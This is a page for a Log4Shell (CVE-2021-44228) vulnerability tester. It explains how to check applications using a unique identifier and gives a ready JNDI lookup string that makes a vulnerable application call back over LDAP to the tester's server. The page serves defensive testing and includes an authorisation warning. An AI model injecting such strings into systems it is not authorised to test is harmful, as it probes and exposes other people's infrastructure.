Huntress Log4Shell Vulnerability Tester

Our team is continuing to investigate CVE-2021-44228, a critical vulnerability that’s affecting a Java logging package log4j which is used in a significant amount of software. The source code for this tool is available on GitHub at huntresslabs/log4shell-tester.

This site can help you test whether your applications are vulnerable to Log4Shell (CVE-2021-44228). Here's how to use it:

Please know that a negative test does not guarantee that your application is patched. The tool is designed to offer a simpler means of testing and is intended for testing purposes only—it should only be used on systems you are authorized to test. If you find any vulnerabilities, please follow responsible disclosure guidelines.

Your unique identifier is: f7b89fd4-6e0a-41ff-a2f7-02e962d27635. You can use the payload below for testing:

${jndi:ldap://honey.codacloud.net:1389/f7b89fd4-6e0a-41ff-a2f7-02e962d27635}

View Connections

Technical Details

The tool works by generating a random unique identifier which you can use when testing input fields. If an input field or application is vulnerable, it will reach out to this website over LDAP. Our LDAP server will immediately terminate the connection, and log it for a short time. This tool will not actually run any code on your systems.